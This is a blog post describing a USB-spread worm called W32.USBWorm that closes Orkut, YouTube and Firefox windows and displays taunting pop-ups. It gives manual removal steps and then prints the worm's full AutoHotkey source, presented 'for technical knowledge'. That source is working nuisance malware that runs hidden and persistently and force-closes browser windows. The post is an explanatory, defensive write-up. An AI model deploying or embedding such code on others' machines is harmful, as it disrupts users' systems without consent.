Orkut has banned you fool! The administrators didn’t write this program guess who did?

Hi Friends Today morning when I logged in to Gmail, my friend Sunil from Hyderabad alerted me via gmail chat that he got one serious problem with his Laptop. He told me that whenever he tried to open Orkut or Youtube he receive one pop-up message saying “Orkut has banned you fool! The administrators didn’t write this program guess who did?”, isn’t it little bit strange? Actually first I heard about this problem few days back but never met any victim till today’s breakfast, but now I have one, my own close friend who fall in this problem, after this I remotely logged in to his Laptop n get rid of it.

Here I’m posting its Solution, Technical details & Script that I got from this malware:

Tech Details:

Name W32.USBWorm
Spread from USB/Pendrive

Message displayed by W32.USBWorm

“I DNT HATE MOZILLA BUT USE IE OR ELSE…”

“USE INTERNET EXPLORER U DOPE”

“Orkut is banned you fool, The administrators didnt write this program guess who did??”

Solution:
Press Ctrl+Alt+Del/Esc
Go to “Process” tab
Arrange process name in ascending order by clicking on “Image Name”
Now look for services “svchost.exe” with User Name as “System”
Right Click it n say “End Process”
Click “Yes” if ask for confirmation, here u may receive one msg saying “System is shutting down in 60 second, save your all work”
Here u need to press “Win+R” key to bring run n then type “shutdown -a” to terminate System Shutdown.
Now go to “C:/Heap41a” n Shift+Del all file.

Hey congrats! your problem is Solved, Say thankx to God.

Original Script:
Pls keep this Script for Technical knowledge not to Exploit any one.

#persistent
#notrayicon
settimer,ban,2000
return

ban:
WinGetActiveTitle, ed
ifinstring,ed,orkut
{
winclose %ed%
soundplay,C:\heap41a\2.mp3
msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The
administrators didnt write this program guess who did??
`r`r MUHAHAHA!!,30
return
}
ifinstring,ed,youtube
{
winclose %ed%
soundplay,C:\heap41a\2.mp3
msgbox,262160,youtube IS BANNED,youtube is banned you fool`,The
administrators didnt write this program guess who did??
`r`r MUHAHAHA!!,30
return
}
ifinstring,ed,Mozilla Firefox
{
winclose %ed%
msgbox,262160,USE INTERNET EXPLORER YOU DOPE,I DNT HATE MOZILLA
BUT USE IE `r OR ELSE…,30
return
}
ifwinactive ahk_class IEFrame
{

ControlGetText,ed,edit1,ahk_class IEFrame
ifinstring,ed,orkut
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The
administrators didnt write this program guess who did??
`r`r MUHAHAHA!!,30
return
}
ControlGetText,ed,edit2,ahk_class IEFrame
ifinstring,ed,orkut
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The
administrators didnt write this program guess who did??
`r`r MUHAHAHA!!,30
return
}
ControlGetText,ed,edit3,ahk_class IEFrame
ifinstring,ed,orkut
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The
administrators didnt write this program guess who did??
`r`r MUHAHAHA!!,30
return
}
ControlGetText,ed,edit4,ahk_class IEFrame
ifinstring,ed,orkut
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The
administrators didnt write this program guess who did??
`r`r MUHAHAHA!!,30
return
}
ControlGetText,ed,edit1,ahk_class IEFrame
ifinstring,ed,youtube
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,youtube IS BANNED,youtube is banned you fool`,The
administrators didnt write this program guess who did??
`r`r MUHAHAHA!!,30
return
}
ControlGetText,ed,edit2,ahk_class IEFrame
ifinstring,ed,youtube
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,youtube IS BANNED,youtube is banned you fool`,The
administrators didnt write this program guess who did??
`r`r MUHAHAHA!!,30
return
}
ControlGetText,ed,edit3,ahk_class IEFrame
ifinstring,ed,youtube
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,youtube IS BANNED,youtube is banned you fool`,The
administrators didnt write this program guess who did??
`r`r MUHAHAHA!!,30
return
}
ControlGetText,ed,edit4,ahk_class IEFrame
ifinstring,ed,youtube
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,youtube IS BANNED,youtube is banned you fool`,The
administrators didnt write this program guess who did??
`r`r MUHAHAHA!!,30
return
}
}

return

Check Also

DuPage Medical group was victim of Cyber-attack in mid-July, potentially compromised patients’ information

Date: 30th August 2021 Severity: High The DuPage Medical group have started notifying patients about …

Leave a Reply

Your email address will not be published.